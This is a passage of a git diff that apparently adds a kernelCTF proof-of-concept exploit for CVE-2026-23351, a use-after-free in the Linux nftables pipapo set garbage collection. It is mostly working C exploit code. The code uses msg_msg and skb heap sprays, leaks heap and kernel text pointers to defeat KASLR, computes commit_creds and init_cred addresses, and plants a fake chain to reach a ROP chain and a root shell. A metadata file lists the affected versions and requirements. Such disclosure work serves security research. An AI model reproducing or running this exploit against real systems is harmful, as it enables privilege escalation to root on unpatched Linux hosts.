handles GP completion. + * Main thread just waits — don't waste CPU 0 time. */ + int gp_calls = 0; + while (!cctx.done) { + usleep(500); /* Yield CPU 0 to commit+spray */ + gp_calls++; + } + + /* Wait for commit to finish */ + pthread_join(commit_tid, NULL); + uint64_t commit_us = cctx.t_done - t0; + rc = cctx.result; + fctx.recording = 0; + sctx1.stop = 1; + gpctx.stop = 1; + pthread_join(spray1_tid, NULL); + pthread_join(gp_tid, NULL); + num_commits++; + + long spray_delta = sctx1.count - spray_pre; + printf("[*] Commit: %s %.1fms, spray1=%ld(+%ld ph%d), gp_mbr=%d, changed=%ld, miss=%ld, hit=%ld\n", + rc ? "FAIL" : "OK", commit_us / 1000.0, + sctx1.count, spray_delta, sctx1.phase, gpctx.count, fctx.changed, fctx.miss, fctx.hit); + /* Time buckets (always print to see UAF window coverage) */ + printf(" time buckets:\n"); + for (int b = 0; b < 10; b++) { + long m = fctx.bucket_miss[b], h = fctx.bucket_hit[b], c = fctx.bucket_changed[b]; + printf(" %2d-%2dms: miss=%ld hit=%ld changed=%ld\n", + b*2, (b+1)*2, m, h, c); + } + + if (fctx.changed == 0) { + /* Debug: print first 20 raw recv values during commit window */ + printf(" DEBUG raw values (n_raw=%d):\n", fctx.n_raw); + for (int i = 0; i < fctx.n_raw && i < 20; i++) { + printf(" [%d] t=%ldus val=0x%016lx\n", + i, (long)fctx.raw_ts[i], (unsigned long)fctx.raw_vals[i]); + } + printf(" No UAF this cycle\n"); + } else { + + /* Analyze returned values. + * After msg_msg reclaim in kmalloc-cg-512: + * ext->offset[DATA] = byte 3 of m_list.next pointer. + * offset[DATA] < 8: reads from m_list.next → kernel heap pointer! + * offset[DATA] 8-15: reads from m_list.prev → kernel heap pointer! + * offset[DATA] 16-23: reads from m_type (=0x42) + * offset[DATA] 24-31: reads from m_ts (=SPRAY_MSG_DSIZE=464) + * offset[DATA] 32-39: reads from next (=NULL) + * offset[DATA] 40-47: reads from security (LSM ptr, if non-NULL) + * offset[DATA] 48-511: reads from mtext (our marker pattern 0x41+i) + * All reads stay within the same 512B object. */ + printf(" changed=%ld (zero_vals=%ld, unique=%d)\n", + fctx.changed, fctx.changed - (fctx.n_unique_vals > 0 ? 0 : fctx.changed), + fctx.n_unique_vals); + for (int i = 0; i < fctx.n_unique_vals; i++) { + uint64_t v = fctx.changed_vals[i]; + uint8_t *vb = (uint8_t *)&v; + printf(" val[%d] = 0x%016lx bytes=[%02x %02x %02x %02x %02x %02x %02x %02x]", + i, (unsigned long)v, + vb[0], vb[1], vb[2], vb[3], vb[4], vb[5], vb[6], vb[7]); + + /* Check if this looks like our mtext marker pattern. + * mtext[j] = 0x41 + j. If we read from ext+offset[DATA], + * and offset[DATA] ∈ [48,127], then read_off = offset[DATA] + * and mtext_off = read_off - 48, first byte = 0x41 + mtext_off. */ + /* Check if sequential mtext pattern (mtext[j]=0x41+j, wraps at 256). + * With 208-byte mtext, pattern covers nearly all byte values. */ + { + int is_marker = 1; + for (int j = 1; j < 8; j++) { + if (vb[j] != (uint8_t)(vb[0] + j)) { is_marker = 0; break; } + } + if (is_marker) { + int mtext_off = (uint8_t)(vb[0] - 0x41); + int read_off = mtext_off + 48; /* offset from ext/msg_msg start (hdr=48) */ + printf(" ← MTEXT (off=%d, offset[DATA]=0x%02x)", + mtext_off, read_off); + printf("\n"); + continue; + } + } + + /* Try all 8 rotations to find a valid kernel pointer. + * Classify as HEAP (direct-map 0xFFFF8xxx-0xFFFFeaxx) or + * TEXT (kernel text 0xFFFFFFFF8xxxx-0xFFFFFFFFBxxxx). + * TEXT ptrs come from uninitialized REG_3 stack residue when + * element appears expired (offset[EXPIRATION]=0xFF after msg_msg + * reclaim) — the register isn't written, payload writes stack garbage. */ + int found_ptr = 0; + for (int rot = 0; rot < 8; rot++) { + uint8_t P[8]; + for (int j = 0; j < 8; j++) + P[j] = vb[(rot + j) % 8]; + if (P[7] == 0xFF && P[6] == 0xFF && (P[5] & 0xF0) >= 0x80) { + uint64_t ptr; + memcpy(&ptr, P, 8); + /* Filter false positives: reject if low bytes look like + * known msg_msg fields (m_type=0x42, m_ts=0x50) */ + if (rot != 0 && (P[0] == 0x42 || P[0] == 0x50) && + P[1] == 0x00 && P[2] == 0x00 && P[3] == 0x00) { + printf(" ← FALSE_PTR (rot=%d, msg_msg field): 0x%016lx", + rot, (unsigned long)ptr); + } else { + /* Classify: TEXT ptr has bytes 4-7 all = 0xFF + * and byte 3 >= 0x80 (kernel text range). + * HEAP ptr has bytes 6-7 = 0xFF but bytes 4-5 variable. */ + int is_text = (P[4] == 0xFF && P[5] == 0xFF && + P[6] == 0xFF && P[7] == 0xFF && + (P[3] & 0x80)); + if (is_text) { + printf(" ← TEXT PTR (rot=%d): 0x%016lx", rot, (unsigned long)ptr); + if (!text_leak) + text_leak = ptr; + } else { + /* Validate: kmalloc-cg-512 objects are 512-byte aligned */ + if ((ptr & 0x1FF) != 0) { + printf(" ← HEAP PTR (rot=%d, UNALIGNED): 0x%016lx", rot, (unsigned long)ptr); + } else { + printf(" ← HEAP PTR (rot=%d): 0x%016lx", rot, (unsigned long)ptr); + if (!heap_leak) + heap_leak = ptr; + } + } + found_ptr = 1; + } + break; + } + } + if (!found_ptr) { + /* Check for partial kernel pointer: scan for 0xFF 0xFF sequence */ + int has_ff = 0; + for (int j = 0; j < 7; j++) { + if (vb[j] == 0xFF && vb[j+1] == 0xFF) { has_ff = j; break; } + } + if (has_ff) { + printf(" ← PARTIAL_PTR (ff_ff at byte %d)", has_ff); + } else { + printf(" ← UNKNOWN (not marker, not ptr)"); + } + } + printf("\n"); + } + + if (heap_leak) { + printf("\n[+] HEAP LEAK at cycle %d: 0x%016lx\n", + cycle, (unsigned long)heap_leak); + printf("[+] page_offset_base: 0x%016lx\n", + (unsigned long)(heap_leak & ~0xFFFFFFFFULL)); + /* text_base already known from side-channel */ + printf("[+] text_base (side-channel): 0x%016lx\n", (unsigned long)text_base); + break; + } + if (text_leak) { + /* Also accept text pointer from UAF if we get one */ + if (!text_base) + text_base = text_leak & ~0xFFFFFFULL; + } + + printf(" UAF confirmed but no kernel pointer this cycle\n"); + + /* KASLR alignment check: offset[DATA] = byte 3 of m_list.next, + * which includes KASLR page_offset_base shift at 1GB granularity. + * Base byte 3 cycles: 0x00(N=0), 0x40(N=1), 0x80(N=2), 0xC0(N=3). + * Only N=0 gives offset[DATA] < ~0x30, hitting msg_msg header + * where kernel pointers reside. N=1,2,3 always read mtext. + * KASLR is fixed per boot, so if cycle 1 shows mtext, all will. + * Exit early to let wrapper script reboot and retry (25% per boot). */ + if (cycle == 0 && fctx.n_unique_vals > 0) { + int all_mtext = 1; + for (int i = 0; i < fctx.n_unique_vals; i++) { + uint64_t v = fctx.changed_vals[i]; + uint8_t *vb = (uint8_t *)&v; + int is_marker = 1; + for (int j = 1; j < 8; j++) { + if (vb[j] != (uint8_t)(vb[0] + j)) { is_marker = 0; break; } + } + if (!is_marker) { all_mtext = 0; break; } + } + if (all_mtext) { + uint8_t off_data = (uint8_t)((fctx.changed_vals[0]) - 0x41 + 48); + uint8_t kaslr_n = (off_data & 0xC0) >> 6; + printf("\n[!] KASLR alignment unfavorable: offset[DATA]=0x%02x " + "(N=%d mod 4, base=0x%02x). Need N=0.\n", + off_data, kaslr_n, kaslr_n * 0x40); + printf("[!] Exiting (code 2). Reboot VM and retry (~25%% chance per boot).\n"); + fctx.stop = 1; + pthread_join(ftid, NULL); + free(buf); close(fd); + return 2; + } + } + } /* end else (changed > 0) */ + + /* @step(name="vuln_trigger_exit") In --vuln-trigger mode, one cycle is enough. + * KASAN will have already reported the UAF during the flood thread's lookups. */ + if (vuln_trigger_only) { + printf("[*] --vuln-trigger: UAF triggered, KASAN should have fired. Exiting.\n"); + fctx.stop = 1; + pthread_join(ftid, NULL); + return 0; + } + + /* Wait for RCU GP so old match is freed BEFORE we free spray msg_msgs. + * Without this: freeing all msg_msgs → slab page released to buddy → + * old match's element pointer now dangles → crash on next lookup. + * membarrier + sleep ensures call_rcu(pipapo_reclaim_match) has fired. */ + syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); + usleep(100000); /* 100ms for RCU callback processing */ + printf(" Cleaning up %d queues for next cycle\n", NUM_SPRAY_QUEUES); + { + struct { long mtype; char mtext[SPRAY_MSG_DSIZE]; } drain; + for (int i = 0; i < NUM_SPRAY_QUEUES; i++) { + while (msgrcv(spray_qids[i], &drain, SPRAY_MSG_DSIZE, 0, IPC_NOWAIT) >= 0) + ; + msgctl(spray_qids[i], IPC_RMID, NULL); + } + for (int i = 0; i < NUM_RECLAIM_QUEUES; i++) { + while (msgrcv(reclaim_qids[i], &drain, SPRAY_MSG_DSIZE, 0, IPC_NOWAIT) >= 0) + ; + msgctl(reclaim_qids[i], IPC_RMID, NULL); + } + } + } + + if (!heap_leak) { + printf("[-] No heap leak after %d cycles.\n", MAX_CYCLES); + fctx.stop = 1; + pthread_join(ftid, NULL); + free(buf); close(fd); + return 1; + } + + printf("\n=== PHASE 1 COMPLETE: HEAP LEAK ===\n"); + printf("[+] text_base: 0x%016lx\n", (unsigned long)text_base); + printf("[+] heap_leak: 0x%016lx\n", (unsigned long)heap_leak); + printf("[+] commit_creds: 0x%016lx\n", (unsigned long)(text_base + OFF_COMMIT_CREDS)); + printf("[+] init_cred: 0x%016lx\n", (unsigned long)(text_base + OFF_INIT_CRED)); + printf("[+] nft_immediate_eval: 0x%016lx\n", (unsigned long)(text_base + OFF_NFT_IMMEDIATE_EVAL)); + + /* ====== Phase 3 setup: place fake chain at known heap address ====== + * + * Strategy: + * 1. Drain all Phase 1 spray queues → frees msg_msgs (including one at heap_leak) + * 2. Re-spray msg_msgs with fake chain data → one lands at heap_leak + * 3. Now heap_leak + 48 (mtext start) has our fake chain/blob/rule/expression + * 4. Trigger verdict map UAF → reclaim with skb → verdict GOTO → fake chain → ROP + */ + + printf("\n=== PHASE 3: CODE EXECUTION ===\n"); + + /* Wait for RCU GP to ensure old pipapo match is freed */ + syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); + usleep(100000); + + /* Place fake chain at heap_leak address. + * Per-queue batch: drain entire queue, then refill with fake chain data. + * SLUB per-cpu freelist is LIFO within a batch, so refill reuses freed slots. */ + uint64_t chain_addr = heap_leak + 48; /* mtext[0] in msg_msg at heap_leak */ + + struct { long mtype; char mtext[SPRAY_MSG_DSIZE]; } chain_msg; + chain_msg.mtype = 0x43; + build_fake_chain_mtext((uint8_t *)chain_msg.mtext, heap_leak, text_base); + + struct { long mtype; char mtext[SPRAY_MSG_DSIZE]; } drain_buf; + printf("[*] Per-queue drain+refill on Phase 1 queues...\n"); + int drained = 0, refilled = 0; + for (int i = 0; i < NUM_SPRAY_QUEUES; i++) { + int qcount = 0; + while (msgrcv(spray_qids[i], &drain_buf, SPRAY_MSG_DSIZE, 0, IPC_NOWAIT) >= 0) + qcount++; + drained += qcount; + for (int j = 0; j < qcount; j++) { + if (msgsnd(spray_qids[i], &chain_msg, SPRAY_MSG_DSIZE, IPC_NOWAIT) == 0) + refilled++; + } + } + for (int i = 0; i < NUM_RECLAIM_QUEUES; i++) { + int qcount = 0; + while (msgrcv(reclaim_qids[i], &drain_buf, SPRAY_MSG_DSIZE, 0, IPC_NOWAIT) >= 0) + qcount++; + drained += qcount; + for (int j = 0; j < qcount; j++) { + if (msgsnd(reclaim_qids[i], &chain_msg, SPRAY_MSG_DSIZE, IPC_NOWAIT) == 0) + refilled++; + } + } + printf("[+] Drain+refill: drained=%d refilled=%d\n", drained, refilled); + printf("[+] Fake chain addr: 0x%016lx\n", (unsigned long)chain_addr); + + /* Add verdict map target element (2s timeout). + * This triggers a commit which includes both sets. */ + printf("[*] Adding verdict map target (2s timeout)...\n"); + if (add_target_v(fd, buf)) die("target_v failed"); + num_commits++; + + /* Wait for verdict map target to expire */ + printf("[*] Waiting 3s for verdict map target expiry...\n"); + sleep(3); + + /* Set up skb spray for verdict map UAF reclaim */ + printf("[*] Initializing skb spray...\n"); + if (skb_spray_init() < 0) die("skb spray init failed"); + + /* Build skb payload — verdict points to fake chain in the add_key allocation */ + uint8_t skb_payload[SKB_SPRAY_PAYLOAD]; + build_skb_payload(skb_payload, SKB_SPRAY_PAYLOAD, chain_addr); + + /* Set up Phase 3 spray + commit threads (same architecture as Phase 1) */ + int spray3_qids[NUM_SPRAY_QUEUES]; + int reclaim3_qids[NUM_RECLAIM_QUEUES]; + for (int i = 0; i < NUM_SPRAY_QUEUES; i++) { + spray3_qids[i] = msgget(IPC_PRIVATE, 0666); + if (spray3_qids[i] < 0) die("msgget spray3: %s", strerror(errno)); + } + for (int i = 0; i < NUM_RECLAIM_QUEUES; i++) { + reclaim3_qids[i] = msgget(IPC_PRIVATE, 0666); + if (reclaim3_qids[i] < 0) die("msgget reclaim3: %s", strerror(errno)); + } + + /* Phase 3 spray thread — uses skb spray instead of msg_msg for reclaim. + * We saturate the SLUB cache with msg_msgs first (phase 1 of spray), + * then use skb for the actual reclaim (closer to the kfree). */ + struct spray1_ctx sctx3 = { + .qids = spray3_qids, + .n_queues = NUM_SPRAY_QUEUES, + .reclaim_qids = reclaim3_qids, + .n_reclaim = NUM_RECLAIM_QUEUES + }; + pthread_t spray3_tid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(0, &cpuset); + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&spray3_tid, &attr, spray1_fn, &sctx3); + pthread_attr_destroy(&attr); + } + + struct gp_ctx gpctx3 = {}; + pthread_t gp3_tid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(1, &cpuset); + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&gp3_tid, &attr, gp_forcer_fn, &gpctx3); + pthread_attr_destroy(&attr); + } + + gpctx3.go = 1; + sctx3.go = 1; + sleep(3); /* Let spray saturate SLUB cache */ + + /* Reset flood counters */ + fctx.sent = fctx.recv_ok = fctx.miss = fctx.hit = fctx.changed = 0; + + /* Trigger commit — this runs pipapo_gc on the clone, freeing the expired + * verdict map target. During vmalloc, the skb spray reclaims the slot. */ + /* Phase 3 commit must modify set "v" to trigger pipapo_gc on it. */ + struct commit_ctx cctx3 = {}; + cctx3.fd = fd; + cctx3.idx = dummy_idx++; + cctx3.use_verdict_set = 1; /* Add dummy to "v" so pipapo_gc runs on it */ + pthread_t commit3_tid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(0, &cpuset); + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&commit3_tid, &attr, commit_fn, &cctx3); + pthread_attr_destroy(&attr); + } + + sctx3.go_phase2 = 1; + cctx3.go = 1; + + /* In parallel: spray skbs on CPU 0 during the vmalloc window */ + printf("[*] Spraying skbs for verdict map reclaim...\n"); + int skb_sent = 0; + while (!cctx3.done) { + skb_sent += skb_spray_send(skb_payload, SKB_SPRAY_PAYLOAD); + usleep(100); + } + + pthread_join(commit3_tid, NULL); + (void)(cctx3.t_done); + printf("[*] Phase 3 commit done (rc=%d), skb_sent=%d\n", cctx3.result, skb_sent); + + sctx3.stop = 1; + gpctx3.stop = 1; + pthread_join(spray3_tid, NULL); + pthread_join(gp3_tid, NULL); + num_commits++; + + /* The verdict map element is now reclaimed by either msg_msg or skb. + * If skb reclaimed it: pipapo_lookup returns our controlled verdict → + * NFT_GOTO → fake chain → nft_immediate OOB dreg → ROP → shell. + * + * The flood thread sends packets that trigger the pipapo lookup. + * If everything worked, we already got root via the ROP chain. + * The shell() function was called via iretq return. + * If we're still here, the skb didn't reclaim correctly. */ + printf("[*] Waiting 2s for flood thread to trigger the verdict lookup...\n"); + sleep(2); + + /* If we reach here, the exploit didn't trigger. + * Check flood stats for any changes indicating the UAF happened. */ + printf("[*] Flood stats: sent=%ld recv=%ld miss=%ld hit=%ld changed=%ld\n", + fctx.sent, fctx.recv_ok, fctx.miss, fctx.hit, fctx.changed); + + /* Clean up */ + fctx.stop = 1; + pthread_join(ftid, NULL); + skb_spray_free(); + + for (int i = 0; i < NUM_SPRAY_QUEUES; i++) + msgctl(spray3_qids[i], IPC_RMID, NULL); + for (int i = 0; i < NUM_RECLAIM_QUEUES; i++) + msgctl(reclaim3_qids[i], IPC_RMID, NULL); + + printf("[-] Phase 3 did not trigger. Exploit failed.\n"); + free(buf); + close(fd); + return 1; +} diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/target_db.kxdb b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/target_db.kxdb new file mode 100644 index 000000000..b47d2547a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/target_db.kxdb differ diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/metadata.json b/pocs/linux/kernelctf/CVE-2026-23351_cos/metadata.json new file mode 100644 index 000000000..e4fb70abb --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23351_cos/metadata.json @@ -0,0 +1,22 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp475"], + "vulnerability": { + "summary": "UAF in nft_set_pipapo GC: pipapo_gc frees elements via kfree_rcu while pipapo_clone forces vmalloc, whose cond_resched completes the RCU grace period before rcu_assign_pointer swaps the match", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9df95785d3d8302f7c066050117b04cd3c2048c2", + "cve": "CVE-2026-23351", + "affected_versions": ["5.6 - 6.14"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": ["CONFIG_NF_TABLES"] + } + }, + "exploits": { + "cos-121-18867.381.30": { + "uses": ["userns"], + "requires_separate_kaslr_leak": true, + "stability_notes": "~25% per boot (page_offset_base alignment), reliable within 4-8 reboots" + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23351_cos/original.tar.gz new file mode 100644 index 000000000..1de40ae22 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23351_cos/original.tar.gz differ